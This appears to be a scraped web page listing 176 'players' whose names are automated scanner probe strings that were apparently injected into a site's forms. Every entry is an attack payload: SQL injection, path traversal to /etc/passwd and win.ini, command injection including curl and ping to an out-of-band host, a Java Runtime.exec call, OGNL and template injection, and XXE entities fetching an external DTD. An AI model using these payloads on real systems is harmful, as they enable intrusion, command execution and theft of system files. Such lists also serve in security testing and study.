Players 176
-
set|set&set
🤷
- -1486) OR 8893=8893 AND (4220=4220 🤷
- -1645 OR 8893=8893-- HgnC 🤷
- -1702 OR 5844=2191-- oLFf 🤷
- -3587 OR 1464=5679-- PMLA 🤷
- -3870') OR 8893=8893 AND ('JdWg'='JdWg 🤷
- -4105 🤷
- -5442) OR 1339=6200 AND (8776=8776 🤷
- -5739�' OR 7484=9819 limit 10# 🤷
- -5757' OR 4006=3477 AND 'gHbJ'='gHbJ 🤷
- -5804 OR 8893=8893 🤷
- -6220' OR 7980=3277 AND 'lwJc'='lwJc 🤷
- -7266�' OR 5855=3054 limit 10# 🤷
- -7477') OR 5847=9356 AND ('sxWP'='sxWP 🤷
- -7511' OR 8893=8893 AND 'sgwA'='sgwA 🤷
- -8942 OR 5496=5509 🤷
- -9727�' OR 8893=8893 limit 10# 🤷
- ;`curl 8mswu9mq.dns.9b5501a3.axss.xyz --retry 0`; 🤷
- ;print(md5(security_test)); 🤷
- ;set|set&set; 🤷
- ;system("ping -nc 4 8mswu9mq.dns.9b5501a3.axss.xyz"); 🤷
- !(()&&!|*|*| 🤷
- ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 🤷
- ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 🤷
- ../../../../../../../../../../../../../../../proc/version 🤷
- ../../../../../../../../../../boot.ini 🤷
- ../../../../../../../../../../etc/passwd 🤷
- ../../../../../../../../../../etc/passwd%00.jpg 🤷
- ../../../../../../../../../../windows/win.ini 🤷
- ../../../../../../../../../../windows/win.ini%00.jpg 🤷
- ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 🤷
- ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 🤷
- ..\..\..\..\..\..\..\..\windows\win.ini 🤷
- ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 🤷
- ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 🤷
- ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 🤷
- ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 🤷
- .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 🤷
- ';print(md5(security_test));$a=' 🤷
- '" 🤷
- 'set|set&set' 🤷
- ";print(md5(security_test));$a=" 🤷
- "".getClass().forName("java.lang.Runtime").getMethod("exec", "".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null), "curl http://rndwddlly0g.9b5501a3.axss.xyz") 🤷
- "set|set&set" 🤷
- (SELECT (CASE WHEN (1269=1876) THEN 'aSdFh1' ELSE (SELECT 1876 UNION SELECT 3524) END)) 🤷
- (SELECT (CASE WHEN (6229=6229) THEN 'aSdFh1' ELSE (SELECT 4661 UNION SELECT 2984) END)) 🤷
- ) 🤷
- [] 🤷
- {{17*'9999741'}} 🤷
- /../..//../..//../..//../..//../..//etc/passwd%00.jpg 🤷
- /.././.././.././.././.././.././.././../etc/./passwd%00 🤷
- /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 🤷
- /\../\../\../\../\../\../\../etc/passwd 🤷
- /etc/passwd 🤷
- %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',9285*5928)}
🤷
- %2fetc%2fpasswd 🤷
- %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini 🤷
- `set|set&set` 🤷
- ^(#$!@#$)(()))****** 🤷
- <!-- 🤷
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE body SYSTEM "http://sjb0bc24.dns.9b5501a3.axss.xyz/"><body><method>test</method></body> 🤷
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://sjb0bc24.dns.9b5501a3.axss.xyz/">%xxe;]> 🤷